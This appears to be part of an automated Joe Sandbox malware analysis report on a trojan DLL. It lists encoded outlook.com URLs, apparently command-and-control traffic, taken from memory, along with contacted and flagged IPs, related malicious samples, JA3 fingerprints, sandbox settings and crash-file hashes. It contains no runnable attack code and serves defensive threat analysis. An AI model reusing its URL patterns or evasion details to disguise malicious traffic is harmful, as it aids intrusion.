                                    https://www.outlook.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jrefalse
                                      		high
                                      https://outlook.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jrefalse
                                        		high
                                        https://outlook.office365.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jrefalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&aloaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpfalse
                                            		high
                                            https://mem.gfx.ms/meversion/?partner=msn&market=en-us"loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://watson.telemetry.microsoftvWerFault.exe, 00000013.00000002.531558276.0000000004A0C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/?refurl=%2fmail%2fliopolo%2fjXTvRU37X%2fkKAN62uBd3tDT4UuvXf7%2ftv2pa650q_2BNc4gZloaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmpfalse
                                              		high
                                              http://ogp.me/ns#loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpfalse
                                                		high
                                                https://blogs.msn.coloaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://blogs.msn.com/loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmpfalse
                                                  		high
                                                  https://deff.nelreports.net/api/report?cat=msnloaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.msn.com/en-us//api/modules/fetch"loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpfalse
                                                    		high
                                                    http://ogp.me/ns/fb#loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpfalse
                                                      		high
                                                      https://web.vortex.dloaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      52.98.208.66
                                                      		unknownUnited States
                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                      40.97.161.50
                                                      		outlook.comUnited States
                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      52.98.152.242
                                                      		HHN-efz.ms-acdc.office.comUnited States
                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      40.101.9.178
                                                      		unknownUnited States
                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                      52.97.137.242
                                                      		FRA-efz.ms-acdc.office.comUnited States
                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      13.82.28.61
                                                      		msn.comUnited States
                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                      Private

                                                      IP
                                                      192.168.2.1

                                                      General Information

                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                      Analysis ID:500309
                                                      Start date:11.10.2021
                                                      Start time:22:47:28
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 9m 56s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:6yDD19jMIu.dll
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Run name:Run with higher sleep bypass
                                                      Number of analysed new started processes analysed:32
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal96.troj.evad.winDLL@14/12@14/7
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 18.2% (good quality ratio 17.4%)
                                                      • Quality average: 79%
                                                      • Quality standard deviation: 28.5%
                                                      HCA Information:
                                                      • Successful, ratio: 73%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                      • Found application associated with file extension: .dll
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.139.176.199, 95.100.218.79, 95.100.216.89, 13.107.42.16, 13.107.5.88, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.49.157.6, 131.253.33.203, 2.20.178.18, 2.20.178.24, 20.189.173.20, 104.208.16.94, 52.184.81.210, 20.199.120.182, 40.112.88.60
                                                      • Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, a767.dspw65.akamai.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, config-edge-skype.l-0007.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, config.edge.skype.com, onedsblobprdcus16.centralus.cloudapp.azure.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, iris-de-prod-azsc-eas.eastasia.cloudapp.azure.com, dual-a-0001.a-msedge.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, l-0007.config.skype.com, icePrime.a-0003.dc-msedge.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      22:50:08API Interceptor1x Sleep call for process: rundll32.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      52.98.208.66B6VQd36tt6.dllGet hashmaliciousBrowse
                                                        40.97.161.506yDD19jMIu.dllGet hashmaliciousBrowse
                                                          B6VQd36tt6.dllGet hashmaliciousBrowse
                                                            test1.dllGet hashmaliciousBrowse
                                                              6.dllGet hashmaliciousBrowse
                                                                6101135878f66.dllGet hashmaliciousBrowse
                                                                  a9FUs89dWy.dllGet hashmaliciousBrowse
                                                                    609a460e94791.tiff.dllGet hashmaliciousBrowse
                                                                      13fil.exeGet hashmaliciousBrowse
                                                                        24messag.exeGet hashmaliciousBrowse
                                                                          .exeGet hashmaliciousBrowse
                                                                            .exeGet hashmaliciousBrowse
                                                                              66documen.exeGet hashmaliciousBrowse
                                                                                9messag.exeGet hashmaliciousBrowse
                                                                                  52.98.152.242611237846402f.dllGet hashmaliciousBrowse
                                                                                    40.101.9.178uT9rwkGATJ.dllGet hashmaliciousBrowse
                                                                                      .exeGet hashmaliciousBrowse
                                                                                        https://grandmaster.tempors.com/Get hashmaliciousBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          outlook.comP2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                          • 40.93.212.0
                                                                                          Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                          • 104.47.53.36
                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                          • 104.47.53.36
                                                                                          in7BcpKNoa.exeGet hashmaliciousBrowse
                                                                                          • 40.93.212.0
                                                                                          aXNdDIO708.exeGet hashmaliciousBrowse
                                                                                          • 104.47.53.36
                                                                                          vhPaw5lCuv.exeGet hashmaliciousBrowse
                                                                                          • 40.93.212.0
                                                                                          5sTWnI5RoC.exeGet hashmaliciousBrowse
                                                                                          • 40.93.207.0
                                                                                          57wF9hu0V5.exeGet hashmaliciousBrowse
                                                                                          • 40.93.207.0
                                                                                          7zxmUw3Ml1.exeGet hashmaliciousBrowse
                                                                                          • 104.47.53.36
                                                                                          Nh1UI4PFGW.exeGet hashmaliciousBrowse
                                                                                          • 52.101.24.0
                                                                                          rEYF2xcbGR.exeGet hashmaliciousBrowse
                                                                                          • 40.93.207.1
                                                                                          G2Shy4flZe.exeGet hashmaliciousBrowse
                                                                                          • 40.93.207.1
                                                                                          2nqVnWlyLp.exeGet hashmaliciousBrowse
                                                                                          • 52.101.24.0
                                                                                          nFkQ33d7Ec.exeGet hashmaliciousBrowse
                                                                                          • 104.47.53.36
                                                                                          QE66HWdeTM.exeGet hashmaliciousBrowse
                                                                                          • 40.93.207.0
                                                                                          2H69p1kjC4.exeGet hashmaliciousBrowse
                                                                                          • 40.93.207.1

                                                                                          ASN

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUS6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                          • 13.82.28.61
                                                                                          B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                          • 13.82.28.61
                                                                                          B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                          • 52.97.183.162
                                                                                          P2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                          • 40.93.212.0
                                                                                          b3astmode.x86Get hashmaliciousBrowse
                                                                                          • 72.154.237.78
                                                                                          b3astmode.arm7Get hashmaliciousBrowse
                                                                                          • 20.153.181.154
                                                                                          b3astmode.arm7-20211011-1850Get hashmaliciousBrowse
                                                                                          • 20.63.129.213
                                                                                          TNIZtb3HS3.exeGet hashmaliciousBrowse
                                                                                          • 20.42.65.92
                                                                                          PROFORMA INVOICE -PI6120..htmlGet hashmaliciousBrowse
                                                                                          • 40.101.62.34
                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                          • 52.168.117.173
                                                                                          ntpclientGet hashmaliciousBrowse
                                                                                          • 21.215.78.72
                                                                                          2021catalog-selected products.xlsmGet hashmaliciousBrowse
                                                                                          • 13.92.100.208
                                                                                          K6E9636KoqGet hashmaliciousBrowse
                                                                                          • 159.27.209.248
                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                          • 20.42.73.29
                                                                                          Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                          • 104.47.53.36
                                                                                          mixsix_20211008-150045.exeGet hashmaliciousBrowse
                                                                                          • 20.189.173.22
                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                          • 104.47.53.36
                                                                                          in7BcpKNoa.exeGet hashmaliciousBrowse
                                                                                          • 40.93.212.0
                                                                                          xiaomi-home.apkGet hashmaliciousBrowse
                                                                                          • 104.45.180.93
                                                                                          canon-camera-connect.apkGet hashmaliciousBrowse
                                                                                          • 104.45.180.93
                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUS6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                          • 13.82.28.61
                                                                                          B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                          • 13.82.28.61
                                                                                          B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                          • 52.97.183.162
                                                                                          P2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                          • 40.93.212.0
                                                                                          b3astmode.x86Get hashmaliciousBrowse
                                                                                          • 72.154.237.78
                                                                                          b3astmode.arm7Get hashmaliciousBrowse
                                                                                          • 20.153.181.154
                                                                                          b3astmode.arm7-20211011-1850Get hashmaliciousBrowse
                                                                                          • 20.63.129.213
                                                                                          TNIZtb3HS3.exeGet hashmaliciousBrowse
                                                                                          • 20.42.65.92
                                                                                          PROFORMA INVOICE -PI6120..htmlGet hashmaliciousBrowse
                                                                                          • 40.101.62.34
                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                          • 52.168.117.173
                                                                                          ntpclientGet hashmaliciousBrowse
                                                                                          • 21.215.78.72
                                                                                          2021catalog-selected products.xlsmGet hashmaliciousBrowse
                                                                                          • 13.92.100.208
                                                                                          K6E9636KoqGet hashmaliciousBrowse
                                                                                          • 159.27.209.248
                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                          • 20.42.73.29
                                                                                          Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                          • 104.47.53.36
                                                                                          mixsix_20211008-150045.exeGet hashmaliciousBrowse
                                                                                          • 20.189.173.22
                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                          • 104.47.53.36
                                                                                          in7BcpKNoa.exeGet hashmaliciousBrowse
                                                                                          • 40.93.212.0
                                                                                          xiaomi-home.apkGet hashmaliciousBrowse
                                                                                          • 104.45.180.93
                                                                                          canon-camera-connect.apkGet hashmaliciousBrowse
                                                                                          • 104.45.180.93

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          ce5f3254611a8c095a3d821d445398776yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          aVFOmbW2t7.dllGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          gxJ83rJkgw.msiGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          yR4AxlwcWJ.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          BsyK7FB5DQ.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          SGfGZT66wD.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          uT9rwkGATJ.dllGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          XK1PLPuwjL.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          pHEiqE9toa.msiGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.24481.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          vH0SHswvrb.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          NM0NyvZi8O.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          yOTzv1Qz0n.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          SWaTAV7EdD.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          SKMC07102021.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          50r72IVfM0.msiGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61
                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                          • 52.98.208.66
                                                                                          • 40.97.161.50
                                                                                          • 52.98.152.242
                                                                                          • 40.101.9.178
                                                                                          • 52.97.137.242
                                                                                          • 13.82.28.61

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69688d2812e06195cef530d1f4e704d7e967697_82810a17_00b0a647\Report.wer
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):12044
                                                                                          Entropy (8bit):3.7642068300312155
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:iHiL0oXzHBUZMX4jed+x/u7saS274It7cF:SiVXzBUZMX4jec/u7saX4It7cF
                                                                                          MD5:731DA60D71432CA663B1FDB49265A20A
                                                                                          SHA1:9C0CFA5DF7944AD7166177790882FA3272752727
                                                                                          SHA-256:0BD961F31FA68DC24A3ADA2BEAB0AE6165B3526DE4387C381F0BAF37E3D6DCDB
                                                                                          SHA-512:F7F1876955A8551D510CDB8BCDE5CF73E5B689FA94669A6BA80E61A22E86831EA80B0B640521F7D58FF829161DB05609D0BF4B59AFF3B870E5DE97F24CFA2A57
                                                                                          Malicious:false
                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.1.4.1.9.8.6.2.7.5.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.1.4.3.5.3.0.0.2.5.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.9.a.9.8.f.6.-.3.7.a.6.-.4.2.4.c.-.b.d.2.e.-.6.6.6.3.f.8.4.f.5.b.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.a.a.7.4.6.3.-.f.a.4.d.-.4.6.2.2.-.b.c.f.c.-.e.e.b.6.4.b.1.2.3.9.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.0.-.0.0.0.1.-.0.0.1.6.-.c.c.3.3.-.3.e.c.7.2.c.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69688d2812e06195cef530d1f4e704d7e967697_82810a17_02b4adf8\Report.wer
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):12042
                                                                                          Entropy (8bit):3.7639943799025555
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:r+iX0oX1HBUZMX4jed+5/u7saS274It7cEP:6ipXlBUZMX4jeU/u7saX4It7cEP
                                                                                          MD5:D70C550DA76D4F808A527773BECBB074
                                                                                          SHA1:B25F1C1DA411A3DCEF49B73BC09C54F7B1314AA1
                                                                                          SHA-256:DBA73B5AA4F095E9E528110B199DB20D16FEC947A77D6739678BF8C829B13B9A
                                                                                          SHA-512:96B6A44FF34FCC16DB3768D84CD9EFD9CA382BEE893F0EF581090249BEB3B40C090C1255D7E1519192D6639ED7F4B6FDA4608B77F0D07C91FB4F03A0F64EF57E
                                                                                          Malicious:false
                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.1.4.2.0.5.1.5.1.7.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.1.4.3.7.1.7.1.3.9.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.5.7.a.a.e.5.-.d.d.5.a.-.4.b.8.d.-.9.5.4.a.-.b.b.b.2.5.9.4.d.f.f.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.7.b.0.9.0.d.-.3.f.7.c.-.4.9.e.8.-.a.f.6.0.-.4.e.f.1.c.4.8.f.4.d.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.4.8.-.0.0.0.1.-.0.0.1.6.-.5.a.4.7.-.8.c.c.9.2.c.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69688d2812e06195cef530d1f4e704d7e967697_82810a17_0958cc8c\Report.wer
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):12044
                                                                                          Entropy (8bit):3.7651467727075087
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:23ihS0oXqHBUZMX4jed+5/u7saS274It7cx:2iyXCBUZMX4jeU/u7saX4It7cx
                                                                                          MD5:0A3EA743E9398450836E8532348F36CC
                                                                                          SHA1:33729B785B208ACA681F2DF8549CBFE1B8532C85
                                                                                          SHA-256:F090C9D54A4A54E7891B1E71D7C2689704CB0B2CCBE13E5353B9AF4071BBD4AD
                                                                                          SHA-512:E4A2DA4BACD71789C3D853D45F59E7991E83455952302536B38EBC4AD4A44149C7153A1D374ABBF064D4F791F901D86FE9563A18B0C906485A084AA7536892A1
                                                                                          Malicious:false
